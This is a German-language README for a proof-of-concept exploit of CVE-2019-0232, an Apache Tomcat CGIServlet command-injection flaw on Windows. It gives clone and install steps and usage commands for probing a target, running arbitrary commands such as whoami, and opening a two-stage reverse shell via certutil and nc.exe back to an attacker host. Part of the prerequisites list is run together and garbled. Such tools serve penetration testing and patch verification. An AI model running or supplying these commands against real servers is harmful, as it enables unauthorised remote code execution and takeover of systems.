
CVE-2019-0232 - Apache Tomcat CGIServlet enableCmdLineArguments RCE - PoC Exploit

Apache Tomcat CGIServlet enableCmdLineArguments RCE
Windows-Batch-Skript-Injection über Abfragezeichenfolgen-Argumente
Apache Tomcat mit aktiviertem CGI-Servlet und enableCmdLineArguments=true übergibt Abfragezeichenfolgen-Parameter als Befehlszeilenargumente an CGI-Skripte. Unter Windows interpretieren Batch-Dateien (.bat/.cmd) & als Befehlsseparator, was die Ausführung beliebiger Befehle über eine präparierte URL ermöglicht.
conf/web.xml oder WEB-INF/web.xml aktiviertenableCmdLineArguments=true in den Init-Parametern des CGI-Servletsism.bat) bereitgestellt und erreichbar&-Injektion erforderlich)git clone https://github.com/yuzuki-ayanami/CVE-2019-0232
cd CVE-2019-0232
pip install -r requirements.txt
Prüfen, ob ein CGI-Endpunkt existiert:
python cve-2019-0232.py check -t http://target:8080
python cve-2019-0232.py check -t http://target:8080 --cgi /cgi-bin/printenv.bat
Einen Befehl ausführen:
python cve-2019-0232.py exec -t http://target:8080 -c whoami
python cve-2019-0232.py exec -t http://target:8080 -c 'ipconfig'
Reverse Shell (2-stufig certutil + nc.exe):
python cve-2019-0232.py revshell -t http://target:8080 --lhost 10.0.0.1 --lport 4444